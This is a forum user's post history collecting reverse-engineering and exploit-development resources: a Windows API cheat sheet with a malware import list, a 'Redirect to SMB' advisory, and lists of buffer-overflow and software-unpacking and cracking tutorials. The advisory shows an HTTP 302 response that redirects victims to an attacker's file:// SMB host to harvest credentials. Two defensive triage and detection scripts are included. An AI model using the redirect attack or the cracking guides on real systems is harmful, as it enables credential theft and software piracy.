Everything posted by NO-MERCY
The Windows API for Hackers and Reverse Engineers

The Windows API is one of the “must know” areas for most reverse engineers and exploit writers. It’s an area where the more I use the APIs, the more I find myself looking up specific APIs and wishing that I had known what I know now about these sometimes vague and/or mysterious functions. Why should someone who’s in the INFOSEC community care about these APIs? Well, to put it shortly, they can make your life considerably easier. If you do incident response, are just getting started writing exploits, or anything related, then you’ve likely seen these APIs mentioned before. They’re a crucial part of everything from shellcode design to malware analysis.

One of the most common places you’ll run into these APIs is in malware analysis. The Windows APIs are crucial to nearly every piece of software that runs on Windows. Without these APIs malware authors would be left writing considerably more code, which few malware authors want to do. Knowing that these are going to be the malware’s link to Windows itself, just examining the APIs can give you great clues about what the malware is trying to do. (Note: malware authors could statically compile their code, which would not need to import the APIs; this is not common and would leave the malware sample significantly larger.)

There are endless tools which will show you which APIs are being imported. Some of the most common tools are OllyDbg, Immunity Debugger, IDA Pro, MASTIFF, and countless other tools and scripts. Let’s take a look at a malware sample’s imports.
kernel32.dll DeleteCriticalSection 0x4090dc
kernel32.dll LeaveCriticalSection 0x4090e0
kernel32.dll EnterCriticalSection 0x4090e4
kernel32.dll VirtualFree 0x4090e8
kernel32.dll LocalFree 0x4090ec
kernel32.dll GetCurrentThreadId 0x4090f0
kernel32.dll GetStartupInfoA 0x4090f4
kernel32.dll GetCommandLineA 0x4090f8
kernel32.dll FreeLibrary 0x4090fc
kernel32.dll ExitProcess 0x409100
kernel32.dll WriteFile 0x409104
kernel32.dll UnhandledExceptionFilter 0x409108
kernel32.dll RtlUnwind 0x40910c
kernel32.dll RaiseException 0x409110
kernel32.dll GetStdHandle 0x409114
user32.dll GetKeyboardType 0x40911c
user32.dll MessageBoxA 0x409120
advapi32.dll RegQueryValueExA 0x409128
advapi32.dll RegOpenKeyExA 0x40912c
advapi32.dll RegCloseKey 0x409130
kernel32.dll TlsSetValue 0x409138
kernel32.dll TlsGetValue 0x40913c
kernel32.dll TlsFree 0x409140
kernel32.dll TlsAlloc 0x409144
kernel32.dll LocalFree 0x409148
kernel32.dll LocalAlloc 0x40914c
wsock32.dll closesocket 0x409154
wsock32.dll WSACleanup 0x409158
wsock32.dll recv 0x40915c
wsock32.dll send 0x409160
wsock32.dll connect 0x409164
wsock32.dll htons 0x409168
wsock32.dll socket 0x40916c
wsock32.dll WSAStartup 0x409170
wsock32.dll gethostbyname 0x409174
advapi32.dll RegSetValueExA 0x40917c
advapi32.dll RegCreateKeyA 0x409180
advapi32.dll RegCloseKey 0x409184
advapi32.dll AdjustTokenPrivileges 0x409188
advapi32.dll LookupPrivilegeValueA 0x40918c
advapi32.dll OpenProcessToken 0x409190
user32.dll GetForegroundWindow 0x409198
user32.dll wvsprintfA 0x40919c
kernel32.dll CloseHandle 0x4091a4
kernel32.dll RtlMoveMemory 0x4091a8
kernel32.dll RtlZeroMemory 0x4091ac
kernel32.dll WriteProcessMemory 0x4091b0
kernel32.dll ReadProcessMemory 0x4091b4
kernel32.dll VirtualProtect 0x4091b8
kernel32.dll Sleep 0x4091bc
kernel32.dll GetTickCount 0x4091c0
kernel32.dll MoveFileExA 0x4091c4
kernel32.dll ReadFile 0x4091c8
kernel32.dll WriteFile 0x4091cc
kernel32.dll SetFilePointer 0x4091d0
kernel32.dll FindClose 0x4091d4
kernel32.dll FindFirstFileA 0x4091d8
kernel32.dll DeleteFileA 0x4091dc
kernel32.dll CreateFileA 0x4091e0
kernel32.dll GetPrivateProfileIntA 0x4091e4
kernel32.dll GetPrivateProfileStringA 0x4091e8
kernel32.dll WritePrivateProfileStringA 0x4091ec
kernel32.dll SetFileAttributesA 0x4091f0
kernel32.dll GetCurrentProcessId 0x4091f4
kernel32.dll GetCurrentProcess 0x4091f8
kernel32.dll Process32Next 0x4091fc
kernel32.dll Process32First 0x409200
kernel32.dll Module32Next 0x409204
kernel32.dll Module32First 0x409208
kernel32.dll CreateToolhelp32Snapshot 0x40920c
kernel32.dll WinExec 0x409210
kernel32.dll lstrcpyA 0x409214
kernel32.dll lstrcatA 0x409218
kernel32.dll lstrcmpiA 0x40921c
kernel32.dll lstrcmpA 0x409220
kernel32.dll lstrlenA 0x409224
kernel32.dll lstrlenA 0x40922c
kernel32.dll lstrcpyA 0x409230
kernel32.dll lstrcmpiA 0x409234
kernel32.dll lstrcmpA 0x409238
kernel32.dll lstrcatA 0x40923c
kernel32.dll WriteProcessMemory 0x409240
kernel32.dll VirtualProtect 0x409244
kernel32.dll TerminateThread 0x409248
kernel32.dll TerminateProcess 0x40924c
kernel32.dll Sleep 0x409250
kernel32.dll OpenProcess 0x409254
kernel32.dll GetWindowsDirectoryA 0x409258
kernel32.dll GetTickCount 0x40925c
kernel32.dll GetSystemDirectoryA 0x409260
kernel32.dll GetModuleHandleA 0x409264
kernel32.dll GetCurrentProcessId 0x409268
kernel32.dll GetCurrentProcess 0x40926c
kernel32.dll GetComputerNameA 0x409270
kernel32.dll ExitProcess 0x409274
kernel32.dll CreateThread 0x409278
user32.dll wvsprintfA 0x409280
user32.dll UnhookWindowsHookEx 0x409284
user32.dll SetWindowsHookExA 0x409288
user32.dll GetWindowThreadProcessId 0x40928c
user32.dll GetWindowTextA 0x409290
user32.dll GetForegroundWindow 0x409294
user32.dll GetClassNameA 0x409298
user32.dll CallNextHookEx 0x40929c

Looking over these imported API functions may at first seem useless to the untrained analyst. However, if you begin to dissect what some of the APIs can be used for, you can begin to make assumptions about the function of this malware.
For example, GetTickCount is a very common API for detecting debuggers. AdjustTokenPrivileges and LookupPrivilegeValueA are both commonly used in accessing the Windows security tokens. RegSetValueExA, RegCreateKeyA, and RegCloseKey are used when accessing and altering a registry key. Taking just these APIs into consideration you could begin to make some interesting hypotheses about the capabilities of this specific sample.

I’ve noticed that analysts who don’t totally understand these API functions will typically ignore them. For that reason I’m creating a “cheat sheet” for the Windows API functions. The “pre-final” release is attached below. Please don’t forget that Microsoft did not build these APIs for malicious use and they are very commonly used by Windows programmers (unless it’s an undocumented API). Thus analyzing just the imported APIs may not tell you if a sample is malicious or not (but is very useful if you already know a sample is malicious).

Over the past month I’ve also been working on analyzing what is now over 5TB of malware to gather the most frequently used Windows APIs. This data will likely continue to process for close to another month. Once this is done I’ll work on completing this cheat sheet based on those findings and write another post about my discoveries. Keeping that in mind, this list is not final and if you have any feedback, comments, questions, or recommendations please make them!

In the course of developing the current list I used multiple resources; I’d just like to highlight a few. These are also great resources if you’re looking to learn more.

Resources:
- Practical Malware Analysis – great book on reverse engineering malware
- MSDN – where to go if you’re curious about a specific Windows API
- Windows PE File Details – great article that describes the fundamentals of the PE file and more details surrounding PE file imports

Cheat Sheet Version .5 : Download
Source : https://www.bnxnet.com/windows-api-for-hackers/
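The grouping the post does by hand (GetTickCount for debugger detection, the token APIs, the Reg* APIs) can be automated as a first-pass triage over an import dump. The following is an added example, not code from the post or from the tools it names: it parses the "dll name address" layout above (a subset of the listed imports is embedded as constructed input), buckets API names into capability groups, and turns co-occurring groups into analysis leads. The group names and the lead rules are this example's own choices, not an established classification.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the import listing quoted in the post above
# (dll, API name, IAT address), kept in the same "dll name 0xaddr" run-on layout.
IMPORT_DUMP = """
kernel32.dll GetTickCount 0x4091c0 kernel32.dll WriteProcessMemory 0x4091b0
kernel32.dll ReadProcessMemory 0x4091b4 kernel32.dll VirtualProtect 0x4091b8
kernel32.dll OpenProcess 0x409254 kernel32.dll CreateToolhelp32Snapshot 0x40920c
kernel32.dll Process32First 0x409200 kernel32.dll Process32Next 0x4091fc
kernel32.dll WinExec 0x409210 kernel32.dll CreateThread 0x409278
advapi32.dll RegSetValueExA 0x40917c advapi32.dll RegCreateKeyA 0x409180
advapi32.dll RegCloseKey 0x409184 advapi32.dll AdjustTokenPrivileges 0x409188
advapi32.dll LookupPrivilegeValueA 0x40918c advapi32.dll OpenProcessToken 0x409190
user32.dll SetWindowsHookExA 0x409288 user32.dll CallNextHookEx 0x40929c
user32.dll GetForegroundWindow 0x409294 user32.dll GetWindowTextA 0x409290
wsock32.dll socket 0x40916c wsock32.dll connect 0x409164 wsock32.dll send 0x409160
wsock32.dll recv 0x40915c wsock32.dll gethostbyname 0x409174
kernel32.dll lstrlenA 0x409224 kernel32.dll Sleep 0x4091bc
"""

# Capability groups: the three the post points out (timing/anti-debug, token,
# registry) plus the usual analyst groupings for the other imported names.
# This mapping is the example's own, not an official taxonomy.
CAPABILITIES = {
    "anti-debug/timing": {"GetTickCount", "IsDebuggerPresent"},
    "token/privilege": {"AdjustTokenPrivileges", "LookupPrivilegeValueA", "OpenProcessToken"},
    "registry": {"RegSetValueExA", "RegCreateKeyA", "RegOpenKeyExA",
                 "RegQueryValueExA", "RegCloseKey"},
    "process memory": {"OpenProcess", "ReadProcessMemory", "WriteProcessMemory", "VirtualProtect"},
    "process enumeration": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next",
                            "Module32First", "Module32Next"},
    "window/keyboard hooks": {"SetWindowsHookExA", "UnhookWindowsHookEx", "CallNextHookEx",
                              "GetForegroundWindow", "GetWindowTextA"},
    "network": {"WSAStartup", "socket", "connect", "send", "recv", "gethostbyname"},
    "execution": {"WinExec", "CreateProcessA", "CreateThread"},
}

IMPORT_RE = re.compile(r"(\S+\.dll)\s+(\S+)\s+(0x[0-9a-fA-F]+)")


def parse_imports(dump):
    """Return a list of (dll, api, address) tuples from the run-on dump text."""
    return [(dll.lower(), api, int(addr, 16)) for dll, api, addr in IMPORT_RE.findall(dump)]


def triage(imports):
    """Group imported API names by capability; names in no group go to 'uncategorized'."""
    groups = defaultdict(set)
    for _, api, _ in imports:
        for cap, names in CAPABILITIES.items():
            if api in names:
                groups[cap].add(api)
                break
        else:
            groups["uncategorized"].add(api)
    return {cap: sorted(names) for cap, names in groups.items()}


def hypotheses(groups):
    """Turn co-occurring capability groups into analysis leads, not verdicts:
    as the post stresses, legitimate software imports the same APIs."""
    leads = []
    if "token/privilege" in groups and "process memory" in groups:
        leads.append("privilege adjustment + remote memory writes: check for code injection")
    if "window/keyboard hooks" in groups and "network" in groups:
        leads.append("window/keyboard hooks + sockets: check for input capture sent over the network")
    if "registry" in groups and "execution" in groups:
        leads.append("registry writes + execution: check for persistence (Run keys)")
    if "anti-debug/timing" in groups:
        leads.append("timing APIs present: watch GetTickCount deltas around suspicious branches")
    return leads


if __name__ == "__main__":
    found = triage(parse_imports(IMPORT_DUMP))
    for cap, names in found.items():
        print(f"{cap:22s} {', '.join(names)}")
    for lead in hypotheses(found):
        print("lead:", lead)
```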
How to develop an exploit
NO-MERCY replied to neox's topic in Reverse engineering & exploit development
Part Number 5 : Source : https://rstforums.com/forum/80249-cum-dezvolti-un-exploit-05-a.rst
HOPE TO CONTINUE THIS AMAZING Primer -> NEOX
Reverse engineer for beginners
NO-MERCY replied to ICEBREAKER101010's topic in Reverse engineering & exploit development
18-08-2014 By : Nytro https://rstforums.com/forum/88452-reverse-engineering-beginners-free-book.rst?highlight=Reverse+Engineering+Beginners
Hello RST :

Advanced Heap Overflow Exploitation
By Francois Goichon, 28 Jan. 2015

For 15 years, heap exploitation has gone through a relentless cycle of the disclosure of technical exploitation techniques and consequent hardening of malloc() in response. Notable examples include: the old-school unlink() exploit; the Malloc Maleficarum revisited in 2009; and Google Project Zero's large chunks unlink, where libc fails to compile assert() statements in. Inevitably, most of the techniques described in these papers are now obsolete, have been subsequently patched, or have been rendered unexploitable through the addition of mitigation technologies such as Address Space Layout Randomisation (ASLR) and No eXecute (NX).

Nowadays, exploiting heap structures is heavily dependent on the target application, and in most scenarios the goal is to overwrite pointers or indexes that can eventually provide program counter (PC) control or an arbitrary overwrite. In this paper, however, we target a more specific scenario, where the heap overflow cannot immediately reach interesting data. We present how heap structures can be abused to produce overlapping chunks. The exploitation process is then comparable to use-after-free vulnerabilities. We demonstrate this scenario in both a real-world example and a proof-of-concept program prone to overflows in heap areas where the attacker can predict and further manage chunk allocation. This happens in programs that make an extensive use of malloc() and free() with user-controlled chunks, namely protocol handlers, parsers, editors or, more generally, applications maintaining algorithmic structures of said user-supplied data.

Read the full whitepaper
Source : Advanced Heap Overflow Exploitation

Regards
NO-MERCY
SPEAR - Redirect to SMB
April 13, 2015 By Brian Wallace

We’ve uncovered a new technique for stealing sensitive login credentials from any Windows PC, tablet or server, including ones running previews of the yet-to-be-released Windows 10 operating system. Software from at least 31 companies including Adobe, Apple, Box, Microsoft, Oracle and Symantec can be exploited using this vulnerability, which we have dubbed Redirect to SMB. Carnegie Mellon University CERT disclosed the vulnerability to the public today (#VU672268), following six weeks of working with vendors to help them mitigate the issue.

Redirect to SMB is a way for attackers to steal valuable user credentials by hijacking communications with legitimate web servers via man-in-the-middle attacks, then sending them to malicious SMB (server message block) servers that force them to spit out the victim’s username, domain and hashed password. We are publishing a white paper that describes the issue in detail, and offers mitigation methods for both developers and computer users. For technical details, download the Redirect To SMB white paper.

Original Attack

The Redirect to SMB attack builds on a vulnerability discovered in 1997 by Aaron Spangler, who found that supplying URLs beginning with the word “file” (such as file://1.1.1.1/) to Internet Explorer would cause the operating system to attempt to authenticate with an SMB server at the IP address 1.1.1.1. It’s a serious issue because stolen credentials can be used to break into private accounts, steal data, take control of PCs and establish a beachhead for moving deeper into a targeted network. These “file” URLs could be provided as an image, iframe, or any other web resource resolved by the browser.

We uncovered Redirect to SMB while hunting for ways to abuse a chat client feature that provides image previews. When a URL to an image was received, the client attempted to show a preview of the image. Inspired by Aaron’s research some 18 years ago, we promptly sent another user a URL starting with file:// which pointed to a malicious SMB server. Sure enough, the chat client tried to load the image, and the Windows user at the other end attempted to authenticate with our SMB server.

[Figure: RedirectToSMB-Diagram-1]

While conducting previous research on network protocols, we had experimented with redirecting ordinary HTTP requests to web servers to identify new attacks. So we were curious to see what threats SMB posed when combined with redirects. We created an HTTP server in Python that answered every request with a simple HTTP 302 status code to redirect clients to a file:// URL, and using that we were able to confirm that an http:// URL could lead to an authentication attempt from the OS.

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0,( Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Endoding: gzip, deflate
Host: 192.168.36.207
DNT: 1
Connection: Keep-Alive

HTTP/1.1 302 Found
Content-Type: text/html
Location: file://192.168.36.207/mitmproxy-identifier
Content-Length: 0

[Figure: RedirectToSMB-Diagram-02]

Increased Attack Surface

We identified four commonly used Windows API functions that allow for redirection from HTTP/HTTPS to SMB. Early testing found that they are used by a wide range of software features such as updaters and usage reporting tools. This discovery opened up a wide range of new attack methods. When combined with a man-in-the-middle attack, an attacker can force authentication attempts with an SMB server using susceptible applications and services that transmit data over HTTP or HTTPS.

[Figure: RedirectToSMB-Diagram-03]

Affected Applications

We tested dozens of applications in our lab, uncovering 31 vulnerable software packages, which we disclosed to CERT at Carnegie Mellon University on Feb. 27, 2015. They include:
- Widely Used Applications: Adobe Reader, Apple QuickTime and Apple Software Update (which handles the updating for iTunes)
- Microsoft Applications: Internet Explorer, Windows Media Player, Excel 2010, and even Microsoft Baseline Security Analyzer
- Antivirus: Symantec’s Norton Security Scan, AVG Free, BitDefender Free, Comodo Antivirus
- Security Tools: .NET Reflector, Maltego CE
- Team Tools: Box Sync, TeamViewer
- Developer Tools: Github for Windows, PyCharm, IntelliJ IDEA, PHP Storm, JDK 8u31’s installer

Impact

Redirect to SMB is most likely to be used in targeted attacks by advanced actors because attackers must have control over some component of a victim’s network traffic. Malicious ads could also be crafted that would force authentication attempts from IE users while hiding malicious behavior from those displaying the advertising. Less sophisticated attackers could launch Redirect to SMB attacks on shared WiFi access points at locations such as coffee shops from any computer, including mobile devices. We successfully tested this attack on a home network using a Nexus 7 loaded with all required tools.

Examples

The following examples show different attacks that could be conducted. In order to effectively demonstrate attack scenarios, the conditions have been simplified. The following are the IP addresses of the computers in the examples:
• 192.168.36.207 – The Attacker
• 192.168.36.247 – The Victim
• 192.168.36.128 – The Router/Internet Gateway

The tools in the examples are as follows:
• SMBTrap2
• SMBTrap-mitmproxy-inline.py
• MITMProxy
• Zarp

Additional attack examples are discussed in the white paper.

Attacking AVG via ARP Poisoning
Attacking Microsoft Baseline Security Analyzer via modified DNS record

Encrypted Credentials

While the user credentials sent over SMB are commonly encrypted, the encryption method used was devised in 1998 and is weak by today’s standards.
A stronger hashing algorithm being used on these credentials would decrease the impact of this issue, but not as much as disabling automatic authentication with untrusted SMB servers. With roughly $3,000 worth of GPUs, an attacker could crack any 8-character password consisting of letters (upper and lower case) as well as numbers in less than half a day.

Mitigations

Microsoft has yet to release a patch to fix the Redirect to SMB vulnerability. The simplest workaround is to block outbound traffic on TCP 139 and TCP 445 -- either at the endpoint firewall or at the network gateway’s firewall (assuming you are on a trusted network). The former will block all SMB communication, which may disable other features that depend on SMB. If the block is done at the network gateway’s firewall, SMB features will still work inside the network, but authentication attempts with destinations outside the network will be prevented. See the white paper for other mitigation steps.

Microsoft did not resolve the issue reported by Aaron Spangler in 1997. We hope that our research will compel Microsoft to reconsider the vulnerabilities and disable authentication with untrusted SMB servers. That would block the attacks identified by Spangler as well as the new Redirect to SMB attack.

NO-MERCY : Me & I & myself -> like Microsoft :)
Source : SPEAR - Redirect to SMB
& you can see this post too : 18-year-old Unpatched Vulnerability Affects All Versions of Microsoft Windows
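On the detection side, the redirect shown in the exchange above is easy to recognise in proxy or IDS logs: a 3xx response whose Location would make an SMB-capable client authenticate to a remote host. The following is an added example, not code from the article or from the SMBTrap/mitmproxy tools it names; it parses a raw HTTP response head (a constructed copy of the 302 quoted above, plus a benign redirect) and flags file:// URLs and UNC paths in the Location header. The host names and paths are constructed.

```python
from urllib.parse import urlsplit

# Constructed sample, modelled on the 302 response quoted in the post above.
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Content-Type: text/html\r\n"
    "Location: file://192.168.36.207/mitmproxy-identifier\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Constructed benign redirect for comparison: an ordinary https:// target.
BENIGN_RESPONSE = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Location: https://updates.example.invalid/latest/\r\n"
    "\r\n"
)

REDIRECT_CODES = {301, 302, 303, 307, 308}


def parse_response_head(raw):
    """Return (status_code, {lowercased header name: value}) from a raw HTTP response head."""
    head = raw.split("\r\n\r\n", 1)[0]
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def smb_redirect_target(location):
    """Return the remote host an SMB-capable client would authenticate to, or None.
    Covers file://host/... URLs and UNC paths (\\\\host\\share) in either slash style;
    file:///local/path has no host and is not flagged."""
    loc = location.strip()
    if loc.startswith("\\\\") or loc.startswith("//"):
        host = loc.lstrip("\\/").replace("\\", "/").split("/", 1)[0]
        return host or None
    parts = urlsplit(loc)
    if parts.scheme.lower() == "file" and parts.netloc:
        return parts.netloc
    return None


def detect_redirect_to_smb(raw):
    """Flag an HTTP redirect whose Location would trigger an outbound SMB
    authentication attempt. Returns the target host, or None if the response is clean."""
    status, headers = parse_response_head(raw)
    if status not in REDIRECT_CODES or "location" not in headers:
        return None
    return smb_redirect_target(headers["location"])


if __name__ == "__main__":
    for label, raw in (("sample", SAMPLE_RESPONSE), ("benign", BENIGN_RESPONSE)):
        target = detect_redirect_to_smb(raw)
        print(f"{label}: {'redirect to SMB host ' + target if target else 'no SMB redirect'}")
```

The same check belongs at the egress proxy, alongside the outbound TCP 139/445 block the article recommends, since a blocked SMB connection shows the attempt but not which HTTP response caused it.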
Hello Rst :

This is a little course on Exploit Development for Win32, talking about stack-based BOF & SEH.

Contents :

Stack-Based Buffer Overflow Tutorials : <--- Part One
VLC media player V 0.8.6d (Target)
1- Stack-based Buffer Overflow tutorials. Step 1: Preparing The Skeleton Exploit
2- Stack-based Buffer Overflow tutorials. Step 2: Verifying The Bug
3- Stack-based Buffer Overflow tutorials. Step 3: Finding the overwrite offset
4- Stack-based Buffer Overflow tutorials. Step 4: Picking an overwrite address (JMP ESP: USER32.dll)
5- Stack-based Buffer Overflow tutorials. Step 5: Finding bad characters
6- Stack-based Buffer Overflow tutorials. Step 6: Adding The Final Shellcode
7- Stack-based Buffer Overflow tutorials. Step 7: Porting Exploit to Metasploit Framework
8- Stack-based Buffer Overflow tutorials. Step 8: Porting exploit to Metasploit

Seh-Based Buffer Overflow Tutorials : <--- Part Two :)
Video Spirit Pro (Target)
9- SEH-based buffer overflow tutorials. Step 1: Skeleton Exploit
10- SEH-based buffer overflow tutorials. Step 2: Finding the Overwrite Offset
11- SEH-based buffer overflow tutorials. Step 3: Picking an overwrite address
12- SEH-based buffer overflow tutorials. Step 4: Finding Bad Characters
13- SEH-based buffer overflow tutorials. Step 5: Adding The Final Shellcode

Playlist Youtube : https://www.youtube.com/playlist?list=PLdXylH5WObDcOUUyhoHWUcFImbGNU7nT1
Author : ninjas3c

Regards
NO-MERCY
Hello Rst :

A Brief History of Exploitation
Derbycon 4.0
Devin Cook

I talked about the history of binary exploitation. It was pretty high-level, but my goal was to let people know that this stuff isn't all that hard, and even though you can't really learn it in school there are definitely plenty of resources available online to teach yourself.

Here's the presentation: A Brief History of Exploitation - Derbycon 4.0 | Blog | DevinCook.net
Video :

Regards
Hello RST :

Today I finished a PDF of an excellent article about Windows shellcoding.
Author : Amr Thabet
Original Article Link : The Art of Win32 Shellcoding - CodeProject
Article Copyright 2012 by AmrThabet
Everything else Copyright © CodeProject, 1999-2013
Pdf & Cover By : NO-MERCY
Pages : 28
Password : NOPASS
CRC32: 74D9A885
MD5: DDA15A98C4AD2683593BE29F456D976C
SHA-1: 66D9A72B088D997D811B8AF394B1F693F8810752
All Src's & Pdf Attached In Rar File
Download Link : http://www.4shared.com/rar/Rt5VLqC7ce/The_Art_of_Win32_Shellcoding.html

Regards
NO-MERCY
Heartbleed - The Greatest Paper
NO-MERCY posted a topic in Reverse engineering & exploit development
Hello RST ..

Yesterday, while I was diving in Google, I found someone called David A. Wheeler. He has written a very, very useful book about Secure Programming for Linux and Unix -> How to? Wish I could find the same for Windows!!! That's a great book (2003) --> Old but Gold. You can download it as pdf in -> here <-

This book provides a set of design and implementation guidelines for writing secure programs for Linux and Unix systems. Such programs include application programs used as viewers of remote data, web applications (including CGI scripts), network servers, and setuid/setgid programs. Specific guidelines for C, C++, Java, Perl, PHP, Python, Tcl, and Ada95 are included. For a current version of the book

When I checked out his site I found a lot of amazing articles & papers, so .. check it out.

How to Prevent the next Heartbleed
David A. Wheeler
2014-05-28 (originally 2014-04-29)

I called it The Greatest Paper .. it's really great. Read it from : How to Prevent the next Heartbleed
OR : You can download it as pdf by NO-MERCY --> HERE <--
38 Pages
link 4 Visitors : http://www.4shared.com/office/7aJ1b6cyce/How_to_Prevent_the_next_Heartb.html
MD5 : 88C19FC94C522FBD85BE3BFCCDA28462

Regards
NO-MERCY
Manual Unpacking of UPX using OllyDbg
NO-MERCY replied to Nytro's topic in Reverse engineering & exploit development
Take a look here --> https://rstforums.com/forum/85080-rce-unpacking-e-book.rst
Hello RST ...

RCE Unpacking eBook
Converted & Translated from Vietnamese Compressed HTML (.chm)
Translated from Vietnamese and compiled to (.Pdf) by : Lithium from : Forum.astalavista.ms
Brief overview. 1/9/09
Pages : 2342 -> uh oh !!!
======================================================================

Table Of Contents :
-----------------------------
ASProtect 1.23 RC4 - 1.3.08.24 with CloneCD ASProtect_2.x_SKE_inline_patching_tutorial_by_ThunderPwr_trans Amardillo 4.xx-Patching Hardware Fingerprint (HWID) AntiTracks_Arm 4.xx-Code Splicing AoA DVD Ripper Armadillo & Macromedia Games Armadillo 3.70_IAT elimination_Code splicing_Standard Armadillo 4.xx- Code Splicing (Other Method) Armadillo 5.x Dll - Visual.Assist.X.V10.4.1640 Build 2008.05.22 Armadillo DLL – Unpacking and MORE Armadillo Exact Version Location Tutorial Armadillo v3.xx Manual Unpacking Armadillo_tut_serie1 Armadillo_tut_serie1_fixed Armadillo_tut_serie2 Armadillo_tut_serie3 Armadillo_tut_serie4 Armadillo_tut_serie5 Armdillo_tut_serie6 armdillo_tuts_6_exp armdillo_tuts_7 armdillo_tuts_7_exp armdillo_tuts_8 armdillo_tuts_9 Asprotect20beta AutoPlayMediaStudio6_Arm 4.xx - Standard Protection+IAT Elimination Basic Steps to Unpack Bypass Registration EncryptPE V2.2007 Cach khac de defeat debugBlocker Code_Splicing_Evil_Method DOC_Regenerator211_Debug Blocker+ Hardware Finger Print Debugblocker + Nanomites DiaryOne 5.6 ExeCryptor_2.2.x_2.3.x Game Editor 1.3.2 GetRight60beta_Arm 4.xx Full Protections GetRight_5_0_Final_Arm 2.xx-3.xx - Debug Blocker+CopyMem How to unpack AHTeam EP Protector 0.3 How to unpack ASPack 2.12_dqtln How to unpack ASProtect 1.22-1.23 How to unpack ASProtect 1.23 RC4_dqtln How to unpack ASProtect How to unpack AntiCrack Protector 1.0x How to unpack Asprotect 1.23 rc4 series1 How to unpack Asprotect 1.23 rc4 series2 How to unpack FSG v1.33 How to unpack FSGv2.0 How to unpack PELock v1.0x How to unpack PESpin v0.3
How to unpack Petite 2.2 How to unpack exe32packv1.42 HyperSnap-DX_Arm 4.xx - Standard Protection_IAT Elimination_Code Splicing Inline Patching Ap Document to PDF Converter v3 Inline_Patching for UPX InsaneFIDO UnWrapMe Manual Unpacking & cracking MoleBox Pro 2.6 Trial -Volume 1 Manual Unpacking Software Compress 1.2 Manual Unpacking Armadillo 3.78_Crack and reduce size of ASFConverter 2.68 Manual Unpacking Armadillo v4.64 Small Case Manual Unpacking Armadillo v5.42 Case Study Manual Unpacking Armadillo v600 Manual Unpacking EXEcryptor v2.2.6 with target_ PowerArchiver 2007 Manual Unpacking ID Application Protector 1.2 Manual Unpacking NTkrnl_Protector_0.1 Manual Unpacking _Armadillo_Fraps_Code_Splicing_+_IAT_Elimination Manual Unpacking FSG 2.0 Manual Unpacking Petite 2.3 Manual Unpacking Mew 11 SE v1.2 Manual Fixing IAT-NTKRNL Packer Manual Removing Visual Protect 3.5.4 Manual Unpack ACTIVEMARK 5.31 Manual Unpack ActiveMark 5.x Manual Unpack Armadillo v4.62 Manual Unpack ExeStealth Manual Unpack PECompact 1.68-1.84 Manual Unpack PECompact 2.x Manual Unpack PESpinv0.7 tlandn Manual Unpack tElock 0.90 Manual Unpacking CopyMemII DbgBlocker IAT DiaryOne 5.6 Manual Unpacking & Cracking ActiveMark 5.xx Manual Unpacking ExeCryptor 2.2.50 Manual Unpacking MoleBox v2.5.7 and Serial Fishing Manual Unpacking PEQuake v0 Manual Unpacking SVKP 1.32 Tut 1 - ASM Target Manual Unpacking Total Uninstall 3.7 Manual Unpacking Zip Repair Tool 3.2 Manual Unpacking hmimys-Packer 1.0 Manual unpack ASProtect 1.23 RC 4_by hacnho Manual Unpacking EXE Shield v0.5 Manual Unpacking EZIP 1.0 Manual Unpacking FSG 1.0 Manual Unpacking FSG 2.0 modified Manual Unpacking FSG v2.0 Manual Unpacking MEW 11 SE v1.1 Manual Unpacking Mew 10 exe-coder 1.0 Manual Unpacking Morphine 1.4 - 2.7 Manual Unpacking PE Diminisher v0.1 Manual Unpacking PE Lock NT 2.04 Manual Unpacking PE-SHiELD v0.25 Manual Unpacking PECompact 1.84 Manual Unpacking PECompact 2.0 Final Manual Unpacking PECompact v2.38 Manual 
Unpacking SPLayer 0.08 Manual Unpacking UPX Protector 1.0x Manual Unpacking Virogen Crypt v0.75 Manual Unpacking WWPack32 1.x Manual Unpacking tElock 0.98b1 Manual Unpacking y0da's Crypter v1.2 Movie Collector 4.4_CopyMemII+Nanomites Manual Unpacking Unpack Execryptor 2.x tlandn My Screen Recorder Pro 2 Obsidium 1.2.5.0 - unpacking PictureRipper3_Armadillo 4.xx- Import Elimination+Nanomites ProtectShareware ProtectionPlus 4.x_takada RLPack 1.19 Research Remote System Information 3.2 SWFDecompilerArm 4.xx - Standard Protection SWFText 1.2 SafeDISC2.x Safedisc-Easy or Hard - Vol 1 Safedisc-Easy or Hard - Vol 2 Safedisc-Easy or Hard - Vol 3 SoftWrap 6.1.1_Loader Stupid Execryptor-Fixing Dump Stupid Execryptor-small trick Tag&Rename32rc3_Inline Patching ASProtect 2.2 SKE The Egnima Protector 1.33 Themida_Tutorial 6 Themida_Tutorial1 Themida_Tutorial2 Themida_Tutorial3 Themida_Tutorial4 Themida_Tutorial5 Themida_Tutorial6_exp1 Themida_Tutorial6_exp2 TrojanRemover6.4.4_Trojan Remover-DebugBlocker+Nanomites UNPACKING SLVc0deProtector 1.11 Tut 1_tlandn UNPACKING SLVc0deProtector 1.11 Tut 2_tlandn UnPackMe_Armadillo3.70a.b Unpack PEDiminisher 0.1 Unpack ASPack 2.1 Unpack ASPack 2.12 Unpack ASProtect 1.23 RC4 Unpack Armadillo - Standard protection only_vietnamese Unpack Aspack 1.06b_1.061b Unpack Ezip 1.0 Unpack Mew 10 exe-coder 1.0 Unpack NeoLite2 Unpack PE Pack v1.0 Unpack PECompact 1.68_1.84 Unpack PECompact v1.76 Unpack UnpackMe1_by_KLiZMA Unpack UpX 0.896_1.02 Unpack and Crack Full XP Tools version 4.58 Unpack manual PECompact version 2.55 UnpackMe_CopyMemII_Nanomites Unpack_Armadillo_01 Unpack_Armadillo_02 Unpacking & Cracking RAR Repair Tool 3.0 Unpacking ASProtect 2.3 SKE Unpacking ASProtect 2.XX SKE Unpacking ActiveMark level 2 entry point Unpacking Armadillo 4.xx For Newbie 2 Unpacking EXEcryptor 2.3x Unpacking Flash Recovery 2.35 Unpacking SLVc0deProtector 1.1 Unpacking Unpackme (ASPack + MSLRH) Unpacking Wrapper used by 